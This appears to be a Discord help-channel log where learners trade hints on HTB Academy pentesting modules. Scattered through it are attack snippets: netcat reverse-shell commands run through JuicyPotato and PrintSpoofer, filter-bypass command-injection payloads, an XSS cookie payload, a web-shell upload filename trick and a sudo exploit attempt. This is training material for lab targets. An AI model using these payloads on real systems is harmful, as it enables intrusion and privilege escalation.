The learning process is one of the essential and most important components that is often overlooked. This module does not teach you techniques to learn but describes the process of learning adapted to the field of information security. You will learn to understand how and when we learn best and increase and improve your learning efficiency greatly.
HI, who did file upload attack module?
Hi!, I am with Password Attack Lab - Easy (Examine the first target and submit the root password as the answer.) and i am doing bruteforce with hydra against SSH using username.list and password.list from the resources, this is correct or it is with another wordlists?
i tried with both lists for usernames and passwords, and using root as user and some other password wordlists like rockyou, rockyou-30 and the same password.list from resources, i split the username.list many times and have iterated at least 2 times over all the split lists :c
I do not know if root is the user with whom I have to log in and I only have to find the password, or if I must find the user to later extract the root hash, I think it is more the second option
I'm in Vulnerability Assessment and should use nessus. It asks me to go to the IP given in the credentials. But when I go it says unable to connect. And I am using vpn correctly.
dm if still need help
Have use used also the correct port for Nessus Web Interface?
Yes, isn't it 8834?
Hey hey anyone else having issue connecting through ssh on login brute force ?
can somebody help me with the DNS section of the "Attacking common services" module? i guess i don't understand properly how subbrute works.
anyone can help me in Login Brute Forcing - Service Login? DM me
@tranquil carbon done all may I dm you ?
hello guys
Kk 👌
@knotty hemlock You can DM me if you wish.
Can I get some help with the hashcat module in particular the hybrid lesson?
For anyone working on kali linux (or anything that is not the pwnbox). How do you connect back to your own machine? E.g. when setting up a web server and trying to let an XSS injection fetch something? Which IP address do you use?
I have a question regarding the Extra exercise from the Module: "SECURE CODING 101: JAVASCRIPT "
Extra Exercise: Are you feeling bold?
If you wanted to take it a step further (and prepare for the Whitebox Pentesting 101 module at the same time), it is possible to inject a command that passes the if statement, such that the sendCode function would execute and send the secret message to your HTTP server on our box. To do that, you would have to inject a command that would make the if statement return true, such that it would go into its inner function.
I am no expert in JS, so the (for me) most intelligent way was to try to overwrite the md5 function within the eval function, which worked, but only on a consecutive call of the md5 function. The other solution for me would have been finding a value for which the md5 function outputs the value from the actual statement. But there is no known cleartext for that. So my question is: Is there a general way that an eval in an if statement can be used to cause this if statement to return true or is there a way I can use eval to do such a thing as function overwriting to cause such a behavior to control one part of the statement?
The code for this is more or less something like this:
if (md5(eval('cookie="' + document[cookie] + '"')) == '2b...SNIP...f8') {
do_this();
}
You still need help? If yes DM me
Thank you
hey guys, does somebody know how much data volume the pwnbox needs? I'm sitting in the train and thinking about doing some exercises but just have a mobile hotspot😆
yeah i know, but I have no idea how data intensive the connection is
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks mate, managed just now 🙂
Anyone have any help sheets?
Can someone give me a hint on "Server-Side Attacks - Skills Assessment"? I tried all the sections on the form that reflected my input and nothing
@rustic sage try viewing the page source and look at the javascript function
there is only jQuery been imported, can't find any custom js
ahah, security over obscurity case, they got me, thanks for the tip 😄
Right on, thanks man!
Can someone help me with "command injection" module. Bypassing Other Blacklisted Characters.
anyone who has finished the Using Web Proxies module, to ask some related with one of the exercises..!!!
In the Broken Authentication, part 2. How am I supposed to use this script provided? Where do I run it ?
I'd need a big nudge forward here to get this started, I have no clue what are they trying to explain in the examples
I managed to run the script, but keep getting this:
Any nudge forward, what am I doing wrong here:
@tiny ledge don't even bother with the bruteforce script. Try just using burpsuite or Curl to add the x-forwarded-for header , and any username and password should return the flag 🙂
This worked instantly thank you! Frustrating though that they teach you completely different thing on the module and even request using it 
@tepid jolt try using a combination of ${IFS} and ${PATH:0:1} to run the command: ls /home
meditation
Sure, go ahead and DM. Where are you stuck?
cool, give me a sec to take some notes
let me try some things and if I don't got the flag I send to you a DM, ok?
Np!
hi
Hi anyone could give a hint on the AD Enumeration & Attacks - Skill Assessment Part 1
Submit the contents of the flag.txt file on the Administrator desktop on MS01 ?
I'm trying using runas and wmic but the webshell crashes
ACTIVE DIRECTORY ENUMERATION & ATTACKS - ACL Abuse Tactics. There is no need to hide wley's pass since it's cleartext under Credentialed Enumeration - from Linux
Another thing is that the instance is a static IP. I believe it's shared among us. Don't be surprised to see an error/warning when it's telling you that the user has already been added to the group.
I also think the clean up session is part of solutions for that.
Another thing. HTB allows user to crack password under machines once while. I'm failing to do so recently. have to go for my own kali
Could anyone let me know if you successfully ran hashcat/john on HTB machines, please? Thank you
@woven copper I was able to get it by setting up port forwarding and then RDPing with proxychains. DM me and i can walk you through it 🙂
@west canopy that something you learn on the Pivoting Tunneling module ?
yep !
okay i think i prefer to take the module and then go back to the AD one, thanks for answering me
Do I need to pay to do the HTB academy?
With a free account you should be able to unlock the Fundamental modules but for additional modules yes, it will cost money for a subscription or additional Cubes
Module: INFORMATION GATHERING - WEB EDITION
Section: Active Infrastructure Identification
hi folks, i have the most stupid question probably:* Which CMS is used on app.inlanefreight.local? *
How do I scan the vhost specifically? scanning the target machine doesn't throw CMS information
Can I DM you ?
Hey thanks a lot I realized that I was forgetting to use ${IFS}
@polar widget Sure 🙂
im trying to fine tab and im looking dead at it😂
sure dm
Hey I still can't connect through ssh on Service Authentication Brute Forcing
module. Can't ping it, ssh : connection timed out, I tried with and without openvpn (plus changed openvpn key)
I'm a bit lost ngl
And I tested my ssh service and it's working well on other targets
Can you share the ss?
ScreenShot.
The port's correct?
yep
reset target?
are you sure you are asked to connect like that?
yes it's written use that to connect
The username seems a bit off too
i did not do this module sorry.
ssh b.gates@$IP should work too
append $before IP ?
no
done it too
Can you share me the screenshot of the question and the ip provided in the task?
then it will prompt for a password
sure
normally
then
You found the password?
yup
If yes
Use the following command
ssh b.gates@159.65.58.189 -p 31006
there is a space in the ip but yes use that
Ah that's my keyboard fking cause I am on phone
port 22 is default
that's why I'm confused af
Nice
it can be any port 😄
There's not some reserved one ?
If the task have given you a port
You are expected to use that port
If not provided. It can be either default or you have to search by scanning
Indeed
well hf now
Yup thank again 👽
Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.
Need help on that question I cannot find the second flag.
find / -name flag.txt
nvm I found it.
hi guys i need some help
it can save my sis's life you can helpme
@uneven forum
@sick fulcrum
Please don't ping for no reason
If a life is at stake contact your emergency services
i mean nvm
do you know hacking?
oo
?
If you have a question about hacking I suggest using #613049811481919508 and asking there
#modules is for help on academy modules
ok
And please keep it legal or we'll have to take sanctions
sanctions?
Ban you
oo
but can the illegal stuff be done in dms?
just asking
don't take seriously
sorry
Hoping anyone here can help me with out-of-bound connections. Background: I'm working my way through the modules on my Kali Linux VM running on my Macbook. The VM is connected to the openvpn academy file. I am stuck on ALL the questions that require you to make an out-of-bound connection (AKA connecting from the target machine to my VM for e.g. a remote shell or XXE injection). Whatever IP address I use, I'm not able to connect from the target machine to my web server running on my VM. Really hoping someone could help me out with this.
Are there any extra steps involved in order to allow a remote connection back in to your VM?
Pinging anyone that is not working on the parrot/pwnbox but on a VM
Is firewall on the vm? It should be, but have open ports you need to get connection
Firewall is off as far as I can tell
Hi all!
I have a problem. I didn't understand the meaning of this question :/
The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?
Which module/section?
Module: Using the Metasploit Framework
Section: Sessions
Here is screenshot
You have to find the name of the web application used. So you can find an exploit for this web app. Check the html source as it says. You will find a name which app it is…. Have you checked the source code of the page-view source-?
Thanks, I'll try now
Thanks a lot, it works
Login Brute Forcing Skills Assessment, someone pleaseeee?
I think I'm doing the correct steps, but can't login into ssh.
Solved this
Hi everyone
1st time in discord
I'm working on USING THE METASPLOIT FRAMEWORK module and I'm stuck in session where I try to exploit the machine's web app elFinder
I tried all the options I found in msf "search elFinder" but the machine is not vulnerable
Can anyone give me a hint?
Hey, I'm on the same page. try firefox settings web dev -> page source -> is the word next to Studio-42
Thanks a lot
which section of the module is this?
sudo nmap --script=all $TARGET_IP --min-rate 3500
Module: Metasploit Framework
Section: Sessions & Jobs
Anyone using Brave Browser, Is there fix for the 'Hint' and 'Cheat Sheet' not working:
refresh is a temp fix
Did you set all the necessary options for the exploit?
RHOSTS and LHOST where needed only
I just run it and it worked. (as you said, only RHOSTS and LHOST set)
Maybe try another exploit?
I tried those so far
it worked with one of these options?
dm you
Can anyone help me with Cracking Common hashes? I'm struggling with a solution.
Did you solve this??? @plush garden
I tried No3, but I didn't find answer :/
need help on skill assessment sqlmap essentials i'm kinda stuck
Anyone solved: Broken Authentication - Predictable Reset Token, all I get is this:
Check timezones and try increasing the range. That worked for me.
Also, I remember that the MD5 hash generated on the server was in microseconds, so you might want to perform a multiplication somewhere
any1 ?
DM
Which module to be specific?
Cracking Passwords with Hashcat
what is the question?
Crack the following hash: 7106812752615cdfe427e01b98cd4083
echo "7106812752615cdfe427e01b98cd4083" > hash.txt
hashcat hash.txt /usr/share/wordlist/rockyou.txt
you can use hashid to see what hashing type is
or hash-identifier
I have tried the md5 and NTLM modes, from Hash identifier, no success.
The hint said use a rule and I tried the hybrid mode from previous examples.
Alright once I hop on the desktop I'll let you know
Till then try or have something refreshing
Awesome! Thanks, still drinking coffee to wake up LOL
You know
I first solve questions and then read the theory,
From fundamental - medium modules I've been doing that lmfao.
Or at times we gotta read the necessary theory and practice them right away, this approach I admire it too
HTB academy is doing a great job
So when I cracked some hashes in there, I straight away jumped into their skills assessment,
Last question was challenging and fun, spent some time scripting stuffs
And solved em all
Interesting. Some academics say to read the questions, then read the material so that you can see the answers to look for.
Having familiarity with subject
Well, we're gonna have the cracking with hashcat achievement under our belt tonight
Anyone knows why ffuf can't find the directories?
While with gobuster, I can find them
That's why we validate using different tools
This learning is very crucial while dealing with forensics artefacts too,
Some tools just don't work as expected, and you'll never know
Because you're expecting a output in the end of day
Yeah, but I'm in the "Attacking Web Applications with Ffuf" module...that's why I asked
Lmfao 😂😂
I can't really say about that
Will jump into it later
That's weird...if someone knows why this happens, please tell me
Maybe change user agent to gobuster 😂
Which section is this from?
this is the hash that he posted
I dont know i dont have the module unlocked
does parrot linux work on a 3gb ram machine ?
i currently using linux mint but i want switch to parrot security
Hey guys, can anybody help with the "Bypassing Other Blacklisted Characters" question in the "Command Injections" module?
I have been trying ||127.0.0.1${LS_COLORS:10:1}${IFS}${PATH:5:1}${PATH:2:1}${IFS}${PWD:0:5}${LS_COLORS:10:1} which should be "127.0.0.1; ls /home;"|| but it's not working... could someone please point out what I'm doing wrong? thanks! 🙂
Check if your wordlist contains file extensions or not
It doesn't
I would say you suck, but I'm afraid that you might take offense!
How?
lmao yeah slide in DM
You must have an error in your syntax then. Feel free to DM me and we can figure it out
What is the FQDN of the IP address 10.10.34.136? Anyone know what to do here? I have been trying to zone transfer, but it doesn't seem to work
DM me
did you find the answer?
no need to use $
Any one able to help with " Submit the contents of the flag.txt file on the Administrator desktop on MS01" on AD Enumeration & Attacks - Skills Assessment Part I? I can't get a shell on this box
The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.
Does anyone know how to solve this problem?
Module: Metasploit Framework. Section: Sessions & jobs
What have you tried so far
- I got access into shell
- perl 'print(("A" * 100 . "\x{00}") * 35)' | sudo su id (fail)
- CVE-2021-3156 (fail)
DM me
I don't wanna get comprehensive with the steps publicly
Dm if still need help
Just want to put this out there for anyone just getting started. Do yourself a favor before attempting the "Information Gathering - Web Edition" module, go do the "Footprinting" module first. It will help you tremendously with Active Subdomain section.
trying to tackle this last question on web requests and i cant seem to wrap my head around it, any help would be appreciated!
If I remember I had to delete more than one city to get it to work but feel free to DM me
Has anyone had trouble installing tplmap? The instructions in server side attacks work for me, up until pip install -r requirements
hello everyone, im trying for hours now, the academy module LFI. im on the last question, i can read the content of index.php via using base64 filter in the get param. but other than than im not sure what to do now because index.php appends .php at the end of the file :/ so i cant read other files.
Hi. Can someone give me a hint with Module ATTACKING COMMON SERVICES Section Attacking FTP. I am trying to bruteforce the user on FTP. I know Cry0l1t3 likes making modules hard (had it very difficult on Password Attacks and not very enjoyable) but I find sometimes we have to take different paths from the section to find out things. Also the FTP 2xxx appears and dissappears.
Hi guys, I'm trying to exploit with a PAYLOAD to get sudo old version access but I'm stuck here
i guess you need to set both the rhost and the lhost before exploiting so as to get a reverse shell
thanks, I tried, same result
mind sharing the screenshot after running show options?
php://filter/write
is it possible to use write filter to overwrite a file with LFI ?
what is that??
i'm doing the skills assessment for javascript obfuscation and would like a little help please
I've got deobfuscated code and it's telling me to find a secret key but don't see anything like that in the code
I'm trying to open a session and get root access for old sudo version
okoko
using the metasploit framework?
yes, but the session isn't established @polar widget
you can see it by manually concatenating the strings in the variable called flag
the same for the log at the bottom
have you successfully exploited elFinder ? what did you do with that session
I got the machines shell @polar widget and I need to get root privileges
i already used that
then load the module from msfconsole which deals with the vulnerable sudo version
@supple oasis
I found this one exploit(linux/local/sudo_baron_samedit) but I'm stuck to open a session with PAYLOAD
show me what's in the options set for that specific module
what're you talking about lol
i got it
send a post request to the url with /keys.php and you get an encoded string
time to decode
solved 🙂 thank you
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
i can read the php files content but only php files because it appends them at the end of the parameter.
im not sure how im gonna get remote code execution
im stuck in the very last task for hours now
https://academy.hackthebox.com/module/23/section/513
great!
Does hydra handle well CRLF line terminators?
Hey everyone, any hints for Firewall and IDS/IPS Evasion - Medium Lab
dm me
dm me
hey guys, I'm doing #Attacking SQL Databases section on first question. I have the hash to crack now, but I don't know how to understand what kind of hash it is, to crack it after with hashcat. How can I understand that? I tried to query google with hash, or hash-identifier, but nothing...
use hashid
you can also use dcode but I think hashid is explained in that module
not encountered yet, to understand better, may I ask you by DM?
DM me
DM me
Can anyone help me out with the SQL injection skills assessment. I have done a lot of enumeration/injections and found credentials Im just having trouble with getting a shell
my pleasure.
dm me
@drifting knoll has the NMAP module been changed? The method I used to solve the medium lab no longer works the way I originally solved it. I am just curious? I was able to solve it another way but it bugs me that what I used before fails now.
Module: INFORMATION GATHERING - WEB EDITION
Section: Active Infrastructure Identification
hi folks, i have the most stupid question probably:* Which CMS is used on app.inlanefreight.local? *
How do I scan the vhost specifically? scanning the target machine doesn't throw CMS information
Hey guys! Could anyone help me with the question from the module "Network Enumeration with Nmap / Service Enumeration" - "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I've tried so many options and no luck so far. What am I missing? Appreciate your help. Just need to understand the logic behind this question.
Hey, can I DM you regarding this one? I run the Responder then execute the commands in MSSql but can't get the hash.
or you? 🙃
Solved it using nc at 31337 and tcpdump. Though I barely understand the concept of tcpdump yet. The academy should be more verbose on such things coz we beginners don't get it that easy.
yes but did you try both command ||XP_SUBDIRS|| and ||XP_DIRTREE ||
Yes..I also tried Responder and impacket-smbserver
@uncut raptor try adding app.inlanefreight.local to your /etc/hosts file, and then use whatweb 🙂
even with the hacking machine from htb that's needed?
yep
can't seem to get edit access on the hosts file
there should be a file on the desktop called my_credentials.txt i think
so you can use that password to switch to root user , then edit the file 🙂
it does not want to give up the CMS lol, i did echo "TARGET_IP app.inlanefreight.local" on hosts and the new line is there, but whatweb prints the same as always, OS , plugins, etc, but not cms
Hey everyone. I need help with the module on Windows Fundamentals. Im on the last question in the final section called Skills Assessment. The question is “List the SID associated with the HR security group you created.” I’ve been at this for two hours and I can’t answer it. If someone who has completed this module, help me that would be great. You can DM me so this channel won’t have any spoilers. Thanks ☺️
@umbral yacht I got you dawg 🙂
Thank you! 😩
Hey someone for Windows Privilege Escalation I have a question ?
What is wrong with my command? This tool sucks ass (wordpress skill assessment)
windows privilege escalation skill assessment part 1 anyone do this module? seems obvious escalation paths of Juicypotatoe and printspoofer dont work? getting this error when running juicy {potatoe c:\Windows\Temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Temp\nc.exe 10.10.14.135 5555 -e cmd.exe" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
COM -> recv failed with error: 10038}
working on this module now too whats your question?
Are you sure you find the right website? Check for other links on the page 😉
print spoofer also doesn't seem to work getting error c:\Windows\Temp\PrintSpoofer32.exe -c "c:\Windows\Temp\nc.exe 10.10.14.135 5555 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out. Anyone else that did this module run into a similar issue, and if so any tips or clues what to do next?
Are you sure about this? Everywhere I click does not lead me to another site.
Maybe I'm just dumb,
How about a blog or something? (hope I'm not mixed between module let me go check)
This is what I see
Look for the blog link. Where is it trying to get you to? You just need to update your /etc/hosts to be able to access that vhost. Use the same IP.
Oh, think I don't have the right module. Are you talking about hacking wordpress skills assessment?
yes. And I already edited /etc/hosts
If you hadn't had help yet, think on YouTube I remember seeing a full video guide on there of the SQL injection fundamentals module.
@sweet heron Found what you are talking about. Thank you. Sorry for confusion
Great! 🙂
can anyone help me out with Skills Assessment - File Upload Attacks? Please dm me. I have it mostly figured out already, just stuck on one step!
Looking for help on the File Upload Attacks Assessment as well. I was able to bypass the file upload but unsure how to locate the file nor read any php file, tried using some methods to try reading the config files but still no success.
Hey team, can anybody give me a nudge for Command Injection - Skills assessment?
I'm struggling to get my payload working.
Here is what I have so far:
||http://157.245.46.136:30166/index.php?to=tmp&from=51459716.txt${LS_COLORS:10:1}${IFS}c'a't${IFS}${PATH:0:1}flag.txt${LS_COLORS:10:1}&finish=1&move=1||
I'm getting the following error:
||Error while moving: mv: cannot stat '/var/www/html/files/51459716.txt': No such file or directory
mv: cannot stat 'cat': No such file or directory
mv: cannot move '/flag.txt' to '/var/www/html/files/tmp/flag.txt': Permission denied||
Any hints? 🙂
@stable sparrow try putting your payload after to=tmp
Because for example, if we were using the mv command in linux it would look like: mv /original/file /destination/file . So if we were to chain a command after this, it would come AFTER the destination. If that makes sense
@steep loom @fiery trench DM me 🙂
to anyone that gets stuck on "attacking FTP" section: hint 1 restart target multiple times until port 2121 comes out in nmap hint 2 ftp syntax "ftp IP PORT" hint 3 set no real email as hello@example.com
Password Attacks Module/Password Mutations Section:
I created a wordlist with best64.rule, brute force ssh, hydra running 1 hour and still no result...
Any ideas/hints?
1hr damn :/
Yes...do I have to create the list with another rule maybe? But is very difficult to guess how/which rule to use...
That's why I chose the best64.rule
It also says "One of the most used rules is best64.rule", that's why I chose it
I'm seeing plenty of help requests for this module 👀
I'll collect courage to attempt it this weekend
I'll let you know my strategy then
Friends, tell me what is required of me, I don’t understand the question?😛 (I translate the question into my own language)
Nessus Skills Assessment.
What were the targets for the authenticated scan?
I also tried this with the custom made list as shown in the example. no results.
Anyone help please?
dm
Dm @stable sparrow if you still need help
need help on sqlmap essentials skill assessment
Hello! Why doesn't the target IP work? Link for Module and Section: https://academy.hackthebox.com/module/39/section/414
AD enumeration and attacks, skills assessment part II: Second question, what is the user's cleartext password. I've got the NTLMv2 hash, but can't crack it... Any nudge?
@languid dawn
Where are you stuck, what have you tried? You can DM.

Any nudge forward on: BROKEN AUTHENTICATION - Second Question: Request a reset token for htbuser and find the encoding algorithm, then request a reset token for htbadmin to force a password change and forge a valid temp password to login. What is the flag? | After decrypting the temp pass from Base64, what am I supposed to get from this random set of numbers, I'm drawing complete blank
@rustic sage you can hit the big red button for that kinda stuff :D
Aka srs rule break
Yeah, there's a role we all have in big red letters, use that so you're sure a mod looks into it
Big red button
serious rule break?
DM me
Hello, can someone help me with the live assessment of module SHELLS & PAYLOADS? if so plz me, been stuck on this for a while now
dm if you are still stuck.
nope i didn't change anything, can you send me a DM with both ways you used, so i can take a look
AD Enumeration and Attacks: DCSync section. The last task to provide the NTLM hash for khartsfield. I was able to dump the hashes using secretsdump.py and grepped the output file for the user, but it won't accept that as the answer for the task. I also tried to run mimikatz lsadump::dcsync for the user and it's giving me an error that i've been trying to troubleshoot since yesterday. Any advice?
Nevermind! Reminder to self: Be mindful of : characters in hash string
sqlmap case 7 help anyone?
What's the issue if I may know? Haven't done the module but might help
Hello everyone! I'm in Password attack Medium Lab and got the file 'Doc.zip', which is already cracked, and the file inside has a user/password with which I can log in by ssh, but once I'm inside I can't do anything. Any tip?
What do you exactly mean by "can't do anything"? Like not able to run commands or something else?
in this case I can't do the things learned in module, the next step would be to get the hash of the root user and crack it, but I can't read /etc/passwd
Might have to perform some Privesc or find a way to read the file
Also the password hash is stored in /etc/shadow
dm
thank you but i just got it. it was a silly mistake in my header file
AD Enum and Attacks, skills assessment part II, the password spray to obtain weak creds for another user: I fixed the domainPasswordSpray.ps1 file, but when running it, it doesn't find any users. I manually pass a list I built up, but waiting 1 min between sprays makes it very long (it just hangs)! I already know the right password. Any hint?
kinda solved
Anyone online that can help with footprinting, IMAP and POP3
Where are you stuck?
I have answered all the other questions but I seem to be missing something.
I can connect to imaps or pop3s, I can login as robin, but I cannot seem to find any info while logged in.
Hello
Ok, so you want to use the commands to enumerate the content of robin's emails. I used the openssl command for imaps. Don't forget to add a char before the commands (the 1) ||and login, list and fetch.||
tried that but there are 0 emails
AD enum and attacks, Skills Assessment part II: I can't seem to connect using mssqlclient. From the error message, I guessed I needed to connect to it from the host I have a foothold on, but I'm at a loss using PowerUpSQL to send commands.
The admin's desktop flag on SQL01
You don't need the -windows-auth
any help in sqlmap skills assessment, I can't find the vuln injection point
Try to add something to your cart.
Capture the request with burp and save it as a file to use with -r. What command are you using? You can DM.
sure
I have a code but it still doesn't work, why
????
it doesn't work
what doesn't work @rustic sage ?
Stuck at AD enum and attacks, Skills Assessment II: getting the admin flag on MS01 host. I'd need a nudge if anyone is available.
@sweet heron try running lazagne on SQL01 to find the password for ||mssqlvc|| and then use the credentials to RDP into MS01
Thanks, that helps! I tried that, but I was not able to crack the mscache passwords.
@sweet heron when you run lazagne you can see cleartext creds
"0 passwords have been found". And I am nt authority\system
how did you run lazagne
.\lazagne.exe all
Well maybe you have to reset the box, because I got cleartext creds with system and lazagne
I had cleartext password on the place where it stands DefaultPassword
which host is 60
hostname
SQL01
anyone who has completed XSS module?
@sweet heron That's super weird, not sure why your lazagne isn't dumping the password
Title says with Hydra, but command uses Medusa
The rest works, except now I'm starting to get lost at accessing dc01!
anyone who has achieved the XSS stored exercise?
I'm trying to inject the subjected payload but isn't working
Anyone done the windows privilege escalation module 1st skill assessment? Need a tip on how to escalate the privileges, tried juicypotato.exe and print spoofer.exe, they don't seem to work.
@wheat garden DM me 🙂
You do too much lol ok
@tight mesa this is the first section of the module right?
it should just be: <script>alert(document.cookie)</script>
nope working, looks like is sanitizing the input
Literally just worked for me first try
good evening 🙂 I think there is a kind of mistake or I simply don't understand the type of answer in the Nessus module skill assessment. I tried with the IP, the Server Names, with both... no way. Can anyone please help me:
@gleaming sequoia it should just be a single IP address (the machine that was scanned)
well in my case is not working is like is not accepting the <script> tag
thanks but it asks for the targetS... I tried to separate them with a comma, slash, dots..
ok thanks a lot!
I tried on Firefox and Brave
NP, yes the question is kind of misleading 🙂
Weird, I did it on Brave just now
not said what say {not sure if this is the right way to say in english}
Any hint welcomed for AD Enum and Attacks, Skills 2: getting to DC01. Can't even connect to it yet! Been working on this assessment all day! 
@sweet heron were you able to find the credentials for the ||CT059 ||user?
yes!
We should be able to RDP into DC01 with that user's credentials 🙂
evil-winrm nor xfreerdp work for me...
😦
I'm unlucky tonight! Almost at the end though!
Hi! I'm on Password attack lab - hard and I got a Backup.vhd, is it relevant?
Hey team! Could somebody lend a hand with File Upload Attacks - Whitelist Filters?
I have fuzzed the upload function and have a series of "File Successfully uploaded" responses, but for some reason when I try to navigate to it, the file can't be found... Any ideas?
filename="shell.phar%20.jpg"
URL: http://157.245.33.77:32203/profile_images/shell.phar .jpg
@stable sparrow dm me if you still need help
you need to crack that file to finish the module
😮 thanks!
are there any htb academy modules that go over using burp suite?
proxy one does i guess
web
On the new module "Information Gathering - Web Edition" on the "Active Infrastructure Identification" section and 2nd question "Which CMS is used on app.inlanefreight.local? (Format: word)" ,
I'm 100% sure my answer is correct but it shows an error. Anyone to DM my answer so I resolve this?
Hey guys, in the modules section of the using the metasploit framework module. For some reason, I can't execute the exploit to complete the question
If you want DM me
Plus to this -> #modules message
I have another issue, in question "Find and submit the contents of the TXT record as the answer.", I found the TXT record but can't submit the answer.
I have some issues with this module. Can I DM someone?
the flag doesn't work?
Nope. Some other answer fields too..
Any idea? Can you help me with this?
i have no idea
and I don't own the module so I won't be helpful sorry
looks like they want the content of a txt file
is it the right one?
It's the TXT Record of the DNS. I think question is clear, that's what they ask for.
I can't be SO wrong... 😛
@drifting knoll Can I DM you about the Information Gathering - Web Edition ??
Any hints on this: Login with the credentials "htbuser:htbuser" and abuse the reset password function to escalate to "htbadmin" user. What is the flag? | Which seclist to use ?
I'm trying to bruteforce it, but it's way too slow with 10k passwords:
sure
The free version of burp is very slow, you can always write a python script that will be faster
Burp community is I think only 1 thread and like 3 requests per seconds
Got it thanks!
Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag? | Are they looking for htbadmin here? I've encoded my new cookie while using the same time as from the htbuser cookie, but it still gives me this:
Hey! I somehow can't get the phishing part of xss to work: https://academy.hackthebox.com/module/103/section/984, i.e. when trying to remove the Image Url field, the code doesn't execute
can you please give me a hint ?
Hey I wanna ask, why every time I want to scan the htb from my computer and using openvpn, it doesn't give me any port open
But when I try with web pwnbox, it returned 5-8 ports opened
Is it because I haven't configured proper settings or something?
Maybe check your local attacking machine's firewall rules
Reset the VPN connection
What is a good wordlist for last exercise on ffuf?
Anyone nudge me forward here? I have the name as htbadmin, role as admin, time (i've tried epoch time copying the one from the OG cookie, using my own IP's epoch and the PWNbox IP's epoch) I've also tried everything with capital letters and normals. The question is talking about ' super user ' -- But I assume this must be htbadmin right ?
@distant stream DM you regarding the "Passwd, Shadow & Opasswd" of Password Attacks ???
Ok
Help! Since yesterday, I can't even ping the target for the Windows Priv Esc Skills Assessment part I. I can't interact with targets at all. Am I missing something or is there a bug. Re-downloading a new vpn doesn't help.
Skills Assessment II works fine.
Does anybody know if the final assignment of the Hacking Wordpress module requires a password attack? Been running rockyou.txt for a while now but might be chasing a rabbit hole.
oops was using the wrong payload 🤦♂️
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5000/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Using which port I can get access to shell?
@blissful verge Should I submit a support ticket? 100% packet loss. Solved, nmap -Pn works. The target doesn't respond to ping, that's why.
@sweet heron I was having some connection troubles as well with a different module. I switched to a different VPN server which resolved the issue for me